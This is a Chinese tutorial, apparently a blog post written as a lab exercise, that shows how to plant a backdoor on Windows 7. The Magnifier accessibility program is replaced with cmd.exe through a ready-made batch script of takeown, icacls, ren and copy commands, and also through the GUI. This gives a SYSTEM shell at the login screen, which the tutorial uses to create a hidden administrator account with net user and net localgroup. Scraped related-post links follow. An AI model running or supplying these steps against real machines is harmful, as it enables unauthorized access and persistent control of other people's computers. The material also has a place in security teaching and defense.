1. 实验概述

(1)实验环境:

win7虚拟机;

(2)实验描述:

打开win7虚拟机就可以看到左下角有个轻松访问的标志 ,这里面有六个应用,分别是讲述人,放大镜,高对比度,屏幕键盘,粘滞键,筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候,也容易被别人留个后门;如果说这六个应用中的一个被别人暗中替换掉了,那就可以实现在不知道账户和密码的情况下,对电脑进行相应的操作。在本次实验中,将给大家简单介绍一下怎么利用“轻松访问”轻松的创建Windows后门;

(3)实验原理:

利用win7登录账户界面中的 “轻松访问” 中的 程序 (本次实验是放大镜),把它替换为cmd.exe程序,实现在不登录的情况下打开cmd命令提示符(系统管理员权限),并进行一些操作,在计算机上留个后门。

2. 实验过程

方式一:命令行的模式(脚本)写后门

(1)登录账户之前,有个轻松访问,左下角标识

(2)我们的实验就是通过这里的轻松访问设置后门(本次实验是在放大镜上设置后门(将放大镜——>变为cmd命令行));

(3)打开记事本,输入如下的命令(蓝色字体):

切换目录到c:\windows\system32;

cd c:\windows\system32

更改文件名为magnify.exe的所有者为当前用户;

takeown /f magnify.exe

将当前用户所在的组(管理员组)赋予完全访问权限;

icacls magnify.exe /grant administrators:F

将可执行文件magnify.exe更名为magnify_back.exe;

ren magnify.exe magnify_back.exe

将cmd.exe复制并更名为magnify.exe;

copy cmd.exe magnify.exe

(4)保存写好的记事本文件为back.bat,并且保存文件的类型为所有文件。

(5)这时候,就可以看到保存好的back.bat文件了。

(6)打开刚刚建立的文件back.bat,点击鼠标右键---->以管理员身份运行--à出现如下类似的窗口(我这是加入了域,如果没有加域的话,直接点击是就可以了,加域的话需要输入用户名和密码)

(7)之后屏幕会闪烁一下,就说明这个后门已经搞好了,接下来,就是测试一下这个后门是否能够成功。

(8)重新启动电脑,可以看到如下界面,可以看到左下角的那个标识——轻松访问。

(9)点击左下角标识,我们可以看到如下界面呈现的页面,因为我们的后门是对放大镜程序做了更改,将放大镜直接更改为以管理员运行的cmd命令操作行,所以,我们点击放大镜,就可以直接进入cmd。

(10)系统在没有输入用户名和密码的情况下,弹出了cmd命令行界面,而且是system权限。

(11)接下来,我们就可以通过这个命令行界面去创建账户,输入如下的命令;

创建一个新的账户:账户名为newuser,密码为:123.com;

net user newuser 123.com /add

将新创建的用户newuser加入到管理员组中;赋予管理员的权限

net localgroup administrators /add newuser

通过创建的账户名和密码,我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。

(12)关闭这个窗口,尝试登录系统,就可以成功登录进去了(注意:因为我的电脑加入了域,所有需要输入前面的主机名,如果没有加域的话,就只需要输入newuser即可)

方式二:图像化的方式创建后门

(1)进入c:\windows\system32,找到mangify.exe,将他更名为:mangify_back.exe,此时发现无法更名,需要我们去更改权限。

(2)点击mangify.exe右键-- 安全--高级--所有者---将所有者改为本机登录的账户

(3)由于本机登录的账户是普通用户,所有我们更改普通用户的权限,将其改为完全控制

(4)查看users的权限,可以看到权限是 完全控制。

(5)然后我们将mangify.exe,将他更名为:mangify_back.exe,然后将cmd.exe复制一份并改名为mangify.exe,让系统将cmd.exe认为是mangify.exe。

(6)(如上)重新启动电脑,可以看到如下界面,可以看到左下角的那个标识。

(7)点击左下角标识,我们可以看到如下界面呈现的页面,因为我们的后门是对放大镜程序做了更改,将放大镜直接更改为以管理员运行的cmd命令操作行,所以,我们点击放大镜,就可以直接进入cmd。

(8)系统在没有输入用户名和密码的情况下,弹出了cmd命令行界面,而且是system权限。

(9)接下来,我们就可以通过这个命令行界面去创建账户,输入如下的命令;

创建一个新的账户:账户名为newuser,密码为:123.com;

net user newuser 123.com /add

将新创建的用户newuser加入到管理员组中;赋予管理员的权限

net localgroup administrators /add newuser

通过创建的账户名和密码,我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。

(10)关闭这个窗口,尝试登录系统,就可以成功登录进去了(注意:因为我的电脑加入了域,所有需要输入前面的主机名,如果没有加域的话,就只需要输入newuser即可)

是不是很简单呢,大家可以进行尝试操作,还有就是,给自己的电脑增加锁屏密码很有必要,以防不注意被别人在电脑上留个后门。

利用 “轻松访问” 轻松创建Windows后门相关推荐

  1. Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门

    WeBaCoo WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具.借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端. WeBaCoo有两种工作模 ...

  2. 如何在 SAP 轻松访问屏幕上以不同的布局创建不同的启动板

    目的 您将了解如何在 SAP 轻松访问屏幕上以不同的布局创建不同的启动板. 在脚本文件夹中创建此文件,用于自定义 SAP 轻松访问屏幕:SAPLSMTR_NAVIGATION.E0100.sjs // ...

  3. 怎样用计算机命令修复软件,WINDOWS系统损坏无需重装,利用命令一键轻松修复...

    WINDOWS系统损坏无需重装,利用命令一键轻松修复 2021-04-29 17:33:25 16点赞 116收藏 10评论 创作立场声明:分享电脑使用经验 我的电脑是用的WIN10系统.最近使用电脑 ...

  4. 利用相对坐标轻松完成网格袋布局

    注:本篇博文引至南充技术学院杨怀义先生的一篇论文.论文内容如下. 引: 利用相对坐标轻松完成网格袋布局 杨怀义 ( 南充职业技术学院, 四川 南充 637000) 摘要: 网格袋布局管理器是 java ...

  5. live555 单个访问_新的必应栏提供了对搜索和Microsoft Live Services的轻松访问

    live555 单个访问 If you're a fan of Microsoft Bing as your search engine, you might be interested in try ...

  6. 如何开启“轻松访问菜单Easy Access Menu”

    本文中的例子适用于Hub部署结构,Embedded道理差不多,理解为主 note 2441101, 查看wiki上的白皮书,这里有开启Fiori LaunchpadSAP轻松访问菜单所需要的所有细节, ...

  7. python爬去百度文库_利用Python语言轻松爬取数据[精品文档]

    利用 Python 语言轻松爬取数据 对于小白来说,爬虫可能是一件非常复杂. 技术门槛很高的事情. 比如有人认为学爬虫必须精通 Python ,然后哼哧哼哧系统学习 Python 的每个知识点,很久之 ...

  8. 轻松访问 Android 系统源码与下载

    有时研究 Android 某个特性或者协议的时候需要参阅安卓系统源代码中代码实现或者协议文档等.通过正常的建立 repo,git 获取十分耗时,并且速度很慢,除非是需要重新编译系统,定制系统才需要这样 ...

  9. python爬取百度文库_利用Python语言轻松爬取数据

    利用 Python 语言轻松爬取数据 对于小白来说,爬虫可能是一件非常复杂. 技术门槛很高的事情. 比如有人认为学爬虫必须精通 Python ,然后哼哧哼哧系统学习 Python 的每个知识点,很久之 ...

最新文章

  1. 聊聊EIGRP的自动汇总与手工汇总
  2. Java学习之while语句
  3. 理解Linux和其他UNIX-Like系统上的平均负载
  4. 白话Elasticsearch24- 深度探秘搜索技术之TFIDF算法/向量空间模型算法/lucene的相关度分数算法
  5. TensorFlow(三)常用函数
  6. 【树形DP】 HDU 2196 Computer
  7. Keilc的中断号计算方法
  8. sparksql整合hive
  9. SQLSERVER对加密的存储过程、视图、触发器进行解密
  10. java基础练习 2
  11. 兄弟打印机内存已满清零方法_brother打印机怎么清零?brother打印机清零方法
  12. ts 视频流手动合并
  13. 中国蟹养殖和捕捞现状分析,淡水养殖产量占比最高「图」
  14. 别人在忙挖矿,京东架构师却悄悄用区块链搞了件大事!
  15. 多家软件厂商卷入360与腾讯之争
  16. HTML 简单日历制作方法
  17. 手机话费充值和手机流量充值 API
  18. 扫描QR码即可完成移动支付的LevelUp推出集合NFC、QR码等技术的移动支付终端,供商家免费使用 | 36氪
  19. 【字节前端青训营】跟着月影学JavaScript——前端代码优化三大原则之各司其职,夜间模式小案例
  20. 四川2008省选·洛谷·奖励关

热门文章

  1. java斗图表情_Java爬取斗图网站的所有表情包
  2. Python下载微信公众号文章和图片保存至本地
  3. 字节Java高级岗:K8S太火了!花10分钟玩转它不香么
  4. 滴滴出行app——网约车出行的背后(上)
  5. java毕业设计乐居租房网的设计与实现Mybatis+系统+数据库+调试部署
  6. C语言进阶剖析 13 接续符和转义符
  7. 爬取网易云音乐评论《安河桥》,进行分析
  8. python编程计算圆面积math_python编程计算圆面积
  9. 4-tensorflow中张量的数学运算
  10. 关于springmvc静态资源常被忽视,有可能致命的点